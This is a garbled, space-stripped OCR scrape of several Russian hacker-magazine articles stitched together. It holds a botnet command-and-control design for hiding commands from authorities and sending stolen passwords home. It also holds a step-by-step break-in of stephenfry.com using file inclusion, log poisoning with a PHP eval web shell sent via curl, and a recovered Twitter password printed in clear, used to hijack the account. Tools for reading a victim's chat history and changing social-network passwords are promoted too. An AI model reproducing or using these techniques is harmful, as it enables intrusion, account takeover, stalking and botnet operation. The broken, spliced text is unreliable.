книги хакеры / журнал хакер / 128_Optimized

IN RESPONSE TO THE COMMANDS FROM

A MALICIOUS USER, CONCURRENT ATTACKS

TO TARGETING SITE BEGIN

СХЕМАШИФРОВАНИЯСПОМОЩЬЮRSA

разделиться: 3001

Мыполучилиотличнуюмасштабируемость,да ктомуже,какпобочныйпродуктможемдавать разныекомандыразнымучасткам,чтоиногда полезно.

ЗАЩИТАКОМАНД

НедавновСетипроскакивалановостьотом,что какие-тоученыеполучилидоступкботнетуна несколькоднейичто-тотаманализировали.Нам этовообщененужно.Асейчасэтоделаетсяочень просто,ведьфедералымогут,проанализировав бота,узнатькомандыидомены,гдеботыищуткоманды,адальшепередатьлюбуюкоманду,например,«самоуничтожиться».Каквариантзащиты, можемшифроватьAES-ом,апотомпереводитьв BASE64.Соднойстороны,шифрованиемощное, ноеслиботамогутдизассемблироватьидостать пароль,всенашистаранияпойдутпрахом. Вкачестверешенияестьтехнология,которойамериканскиевластивсвоевремяоченьбоялись.Даже запретилипрогу,нанесколькострочекнаписанную наPerl'е,алюди,выражаяпротест,печаталина футболкахкодэтойпрограммы.Кактыпонял—это историяRSA.СпомощьюRSAможнокакшифровать сообщения,такиподписыватьинформацию,тоесть гарантироватьто,чтоименномыподаликоманду. Этимивоспользуемся.Сгенерируемдваключа: пабликиприват,ивкаждыйботзапишемпаблик- ключ.Априват-ключбудемхранитьусебя.Файлс командамитеперьдолженбытьтаким:

ПРОСТОДЕЛЬНЫЙСОВЕТ

3.00:01 08.07.2009

4.23:59 09.07.2009

5.команда 1

6.команда ...

7.хеш_сгенерированный_приватным_ ключем

Впервойстрочке—случайнаяпоследователь- ность,чтонеобходимадлязащитыотрасшифровкиприватногоключа.Вовторойстрочке размещаетсяслучайносгенерированныйдомен, накоторомнаходитсякоманда—этозащищаетот несанкционированногонамикопированияфайла надругиеучасткиботнета(помнимомасштабируемости).Втретьейичетвертойстрочке— время(промежуток,когдакомандаактуальна)и, собственно,списоккоманд.Последняястрочка, сгенерированнаяприватнымключом,—подпись, котораягарантирует,чтокомандапришлаименно отхозяинаботнета.Когдаботсчитываеткоманду, тосвоимпубличнымключомможетпроверить— соответствуетлитекстподписи,еслида—всеОК, еслинет—игнорироватькоманду.Этотспособ позволяетполностьюзащититьботнетот«врагов».Сейчаснесуществуетспособарасшифровки RSAприключев2048бит.Полностьюдержать командывоткрытомвидетоженевсегдаинтересно.Хотяниктоникакповлиятьнеможет,ноот любознательныхможнозащититься,зашифровав файлспомощьюкакого-тосимметрическогоклю- ча,типаAES. Приразработкеботатакжеследует реализоватькомандупосменепубличногоключа вботе.Этосоздастспособпередачичастиботнета

даватьнедолжен,чтогарантирует,чтомыне заберемботнетназад).Дальшенужноотправить ботам,кпримеру,такуюкоманду:

взять_новый_публичный_ключ: "публичный ключ"

ВОЗВРАТРЕЗУЛЬТАТОВ

Обычноботнетамненужноотсылатьинформациюобратно,нодлянекоторыхэтообязательное условие.Возникаетвопрособезопаснойпередаче. Разбототдаетсписокпаролей,—неоченьприятно, еслифедералы,захвативдоступксерверу,потом заблокируютакки,которыеботыстарательнособирали.Длярешенияпроблемывозьмемлюбимый RSA.Онпозволяетспомощьюпубличногоключа зашифроватьсообщения.Расшифроватьсможем лишьмы,снашимсекретнымприватнымключом. Длязаписиинформациинасерверясоветую использоватьPOST-метод.Заранееопределяем имяскрипта,котороебудетприниматьданные (кпримеру,tttt123.php).Аботпослеполучения командыотсылаетшифрованныерезультатына домен,откудаполученакоманда(файлtttt123.php лишьзаписываетфайлнадиск).Далеемыегозабираемксебенакомп,ужетамрасшифровываем приватнымключоми,какводится,анализируем.

АДМИНКА

Вотмыстобоюирассмотрелиархитектуру,котораякажетсяидеальной.Покрайнеймере,яне вижувнейуязвимыхмоментов.Хотяестьминус,

—системасложноватавуправлении.Мноюбыла разработанаудобнаяадминканаPython'e,что автоматизируетрутинууправления.Ксожалению, описаниеужевыходитзарамкистатьи,ноесли тебевсежеинтересноузнатьоееархитектуре— напишимненапочту.

FROM MY СОВЕСТЬ

Каквидишь,дажематематикаиногда(иливсегда) бываетполезна,итовремя,чтотыпотратил(илиеще

МАГ ЗВЕЗДНЫЙ

/ ICQ 884888, HTTP://WAP-CHAT.RU /

МИКРОБЛОГГИНГ

Начнемстого, чтоофициальныйсайт актерарасполагаетсяпоадресуhttp://www. stephenfry.com ипредставляетсобойсобраниепостовизегоблогаифорума, скопище рекламныхбаннеровинекотороеколичество промо-трейлеров, рекламирующихпроизведенияФрая. Такженасайтеможноувидеть твитыактера— stephenfry.com/clubfry/twitter.

АтаккакТвиттерпредоставляетсвойAPI любомужелающему, тозакралосьподозрение, чтогде-товконфигахсайтахранитсяипароль кмикроблогу:). Собственно, нашейконечной цельюбудетполныйконтрольнадtwitter-

аккаунтомактера(twitter.com/stephenfry), на данныймоментимеющем644,489(!) фолловеров.

ПОИСКБАГОВ

Первымделомосмотримсайтнапредмет пабликдвижков. Изтаковыхприсутствуют мойлюбимыйблоговыйдвижокWordPress и печальноизвестныйфорумphpBB. Открыв исходникглавнойстраницыблога(stephenfry. com/blog), можнонаблюдатьследующее:

<meta name="generator" content="WordPress 2.5.1" />

Ксожалению, для2.5.1 версиивордпрессау менявтотмоментнебылоподрукойнеобходимыхэксплойтов, ипришлосьотброситьэтот вариант.

Далеенеобходимоузнатьверсиюфорума phpBB. Сделатьэтоможномногимиспособами, носамыйудобный— переходпо ссылкесисториейверсийдвижкаstephenfry. com/forum/docs/CHANGELOG.html. Таккак последнийchange был«Changes since 2.0.20»,

смеломожноделатьвывод, чтоверсияфорума находитсядалекозапределамипо-настояще- муюзабельныхуязвимостей(если, конечно, не считатьтаковымивсяческиеXSS иCSRF баги). НеиспытываябольшогожеланияиспользоватьизвестныеXSS дляэтойверсииphpBB, я отправилсязасоветомквеликомуимогучему Гуглустакимзапросом:

site:stephenfry.com filetype:php

Наэтотнехитрыйзапроспоисковиквыдал

кучуссылокнаPHP-файлы, которыенаходилисьнасайтеактера. Менясразужезаинте-

ресовалассылкаstephenfry.com/section.php? section=clubfry&subsection=twitter.

Здесьналицодваварианта: либообращение кбазеданныхссоответствующимипараметрами, либоинклудфайловшаблонов.

Решивсразупроверитьвторойвариант, я составилзапрос:

stephenfry.com/section.php?section =clubfry&subsection=/../../../../.

./../../../../../../../../../../.. /etc/passwd%00

Начтодвижоксайтарадостновыдалсодержимое/etc/passwd :). Уязвимостьлокального инклудасработающимнулл-байтомбыла найдена! Делооставалосьзамалым— найти, вкакойфайлзапихнутьзлонамеренныйкод.

УСЛУЖЛИВЫЕЛОГИ

Еслитычиталмоюстатьювпрошломномереz, тодолжензнатьозамечательныхспособах инжектасвоегокодачерезразличныесимво-

ШЕЛЛНАSTEPHENFRY.COM

КОНФИГSTEPHENFRY.COM

лическиессылки, находящиесяв/proc/self/*. Попробуемзаюзатьхранилищелокальных переменных/proc/self/environ:

stephenfry.com/section.php?section =clubfry&subsection=/../../../../.

./../../../../../../../../../../.. /proc/self/environ%00

Ксожалению, /proc/self/environ оказалсядля наснедоступен:(.

Теперь настал черед попробовать проинклудить логи. Путем нехитрого подбора выяснилось, что апачевский error_log находится в /proc/self/fd/2 (будем юзать именно его, так как access_log для такого сайта наверняка будет размером в пару-тройку гигабайт, которые окажутся неподвластными для LFI).

Зачастуювerror_log записываетсябез всякойфильтрациипеременнаяreferer, в которуюкакразтакииможнопроинжектить нашPHP-код. Осталосьтольковызватьошибку, котораяизапишетсявлог. Самойлегко выполнимойявляетсяошибкаследующего формата:

[Sat Jul 11 23:39:21 2009] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /

Чтобывызватьтакуюошибкуизаписатьнаш evil-код, достаточнолишьпослатькнужному хостухэдерспустымзаголовкомHost. Сделатьэтоможно, например, так:

z:/usr/local/bin/curl.exe "http:// www.stephenfry.com/" -H "Host:" --referer "<?php eval($_GET[cmd]); ?>"

Витоге, нашкодуспешнозапишетсяв error_log:

[Sat Jul 11 23:39:21 2009] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /, referer: <?php eval($_GET[cmd]); ?>

РЕЗУЛЬТАТОТСЫЛКИПУСТОГОЗАГОЛОВКАHOST

HTTP://WWW

links

•www.stephenfry. com — виновник торжества.

•ru.wikipedia.org/ wiki/Стивен_Фрай

— об актерена Википедии.

•twitter.com/ stephenfry — микроб-

логСтивенаФраяна

Твиттере.

>>

ТВИТЫ, ВСТРОЕННЫЕПРЯМОВСАЙТАКТЕРА

d3bzQ=');

...

?>

Каквидно, переменнаяSF_TWITTER_PASSWORD зашифрованав base64, такчтонадолишьпропуститьэтозначениечерезфункцию base64_decode иполучитьитоговыйпарольw41la8yon37wo4.

Конечнаяцельпочтидостигнута! Парольполучен(атакойпассворд врядливозможноподобратьспомощьюгрубойсилы). Осталосьзайти вактерскийаккаунтнаtwitter.com иоставитьтамсвоепосланиедля будущихпоколений.

ТВИТТЕР

Ну-с, заходимнаtwitter.com, вбиваемвсоответствующиеполялогин stephenfry ипарольw41la8yon37wo4 иоказываемсязалогиненнымиподаккаунтомФрая:). Послелогинасервисзадаетнампростой вопрос«What are you doing?», накоторыймысрадостьюотвечаем«I’ll be watching you! From Russia with love :)» (результатэтогонехитрого действиятыможешьвидетьнаскриншоте). ВтечениенесколькихминутпослеотправкимоегосообщенияфанатыСтивенаначалипостить своиответы:

RegNomSongs by The Police and Matt Monroe. This is a quiz, right? RT @stephenfry: I’ll be watching you! From Russia with love :)

---

lokimaros@stephenfry How about how Дмитрий Дмитриевич Шостакович radically changed your life and listening habits.

---

NikkiG57@stephenfry tell them about Russia, Wagner and your performance at Glastonbury

---

valpanna@stephenfry I am afraid, very afraid!

---

Benn2100@stephenfry I’ll be watching you too

---

thisheartbeatz@stephenfry have fun in RUSSIA! B)

---

wrathofagony@stephenfry cool in Russia? how is it???

---

CybrHwk@stephenfry Your in Russia? Where about in Russia are you Stephen?

---

chriscattaneoRT @stephenfry: I’ll be watching you! From Russia with love :) ok James!

---

Betty_Bitch@stephenfry and i’ll be watching you on dave, from Wales with love :)

---

sjoes@stephenfry Are you in still Russia?

---

mio@stephenfry wow o_0 where are you now, Stephen?

Похоже, никтонедогадался, чтоаккаунтактеравзломан, афраза «From Russia with love» вовсенеозначает, чтоФрайсейчаснаходится вРоссии.

НЕХИЛЫЙФЛЕШМОБ

Завладеваккаунтомизвестнойличностинакаком-нибудьпопулярном онлайновомсервисе, можноустроитьнетольконехилыйфлешмоб, но иполноценнуюскам/фишинг/спаматаку. Но, конечно, самымзабавнымвтакойситуациибылонедавнеесообщениенаТвиттереБритни Спирсоеесмерти:).

P.S. Спустяпаруминутяудалилсвойпостизмикроблога, ибомоя тонкаядушевнаяорганизациянепозволяеттравмироватьогромную армиюпоклонниковСтивенаФрая. z

/ R0ID@BK.RU /

Читаемхисториперепискиизмэил-агента

РазличныеIM-клиентывпоследнеевремя расплодилисьвогромномколичестве. Причина

— растущаяпопулярностьонлайновыхсистем обменамгновеннымисообщениями. Вкачестве примераможнопривестиmail-агентотMail.ru, набравшийнемаленькуюаудиториююзеров.

Мессенджерполучился действительноудобный ифункциональный, носоднимнедостатком— чу- жуюисториюперепискивнемпочитатьнетак-то просто. Аведьиногдадоступкхисторинеобходим, особенно, еслионаслитаскомпатвоейдевушки:). Однакорешениеесть, иимяему— Mail.ru History Reader. Тулзапредназначенадлядешиф- ровкилоговmail-агентаиприведенияистории перепискивудобочитаемыйвид. Использовать утилудовольнопросто:

1.Сливаем интересующие нас логи переписки с компа жертвы, вида: blabla@ mail.ruhistory.txt

2.Копируем софтинку с нашего DVD себе на винт и запускаем через консоль

3.Указываем history-файл и файл для сохранения результата:

C:\conv.exe blabla@mail.ruhistory. txt blabla@mail.ru.txt

4.Получаем файлик blabla@mail.u.txt, в котором и лежит расшифрованная история переписки :)

Тулзаработаетслогамиmail-агента<= 5.3- версии, такчтолибовсяческиагитируйавтора

— товарищаGar|k'а— надальнейшееразвитие утилы, либоотговаривайсвоюдевушкуобновлять mail-агент. Сорцыутилытынайдешьнанашем диске.

ПРОГРАММА:ODNOKLASSNIKI.RU

PASSWORDCHANGER&ACCOUNT CHECKER

ОС:WINDOWS2000/XP АВТОР:ZDEZBILYA

ВпрошлыхвыпускахХ-Тулзяпубликовал несколькоинтересныхутил, облегчающихвсестороннююработуспопулярнымисоциальными сетями. Небудемнарушатьтрадициюисразу

НастройкаSymVPN

согнем, неговоряужепрополноценныйVPN. ОднакоеслитыявляешьсясчастливымобладателемдевайсанабазеSymbian OS 3rd, считай, что тебеповезло. НетакдавнодляэтойОСпоявился функциональныйVPN-софтподназванием SymVPN, поддерживающийпротоколPPTP с шифрованием128-битнымключомMPPE. Найти утилутысможешьнапорталеwww.telexy.com, которыйпринадлежитразработчикамвсевозможногополезногософтаподSymbian OS. Здесьтебе иSymRDP (Symbian Remote Desktop Connection Client), и SymNC (Network Commander) имного чегоеще. Правда, весьсофтплатный, нодляжи- телейx-USSR действуетскидкав40% (telexy.com/ Support/Publications.aspx?codeid=WGSBI6X6KV),

чтонетакужиплохо. Насамомпорталетыможешьслитьтриальнуюверсиюутилыивтечение 14 днейоценитьвсееепреимущества. Нуипосле оценкиподостоинству, разумеется, купитьза какие-тожалкие820 рублей:).

Дляинсталляциипотребуетсяпройтипроцедуру регистрациииуказатьвсенеобходимыеданные (email, imei твоейтрубы). Этообязательно, ибо копияполученнойтобойтулзыпривязывается кIMEI-номерутелефона. Такилииначе, после получениялинканасофтследуетперейтикее настройке, аименно:

1.Устанавливаем

2.Ребутим мобилку

3.Запускаем утилу, указываем параметры соединения, точку доступа (GPRS/Wi-Fi), IP-сервера, логин с паролем и имя точки доступа, которая будет ассоциироваться с VPN-каналом

4.Выбираем пункт меню «Проверить». Если все в порядке — софтинка выдаст сетевые реквизиты, которые должны быть получены под VPN (IP/маска/шлюз/ DNS)

5.Запускаем стороннюю программу (можно при вырубленном SymVPN) и при запросе точки доступа лицезрим свежесозданную виртуальную точку. Недолго думая, выбираем ее, и весь трафик послушно форварднется на VPN-туннель

Наданныймоментсофтинаадаптированапрак- тическиподвсеюзабельныеSymbiain-приложе- нияиработаетсбольшинствомизвестныхVPNсервисов. Такчтотольколенивыйнеспособен скачать, установитьипостоянноиспользоватьэту прекраснуюутилу.z

065

1)ДжефРаскинсмакетомCanon Cat

2) СовсемещемолодойРаскин(70-егоды) 3)Новенькие«Кошки» 4) КусочекмастерскойДжефа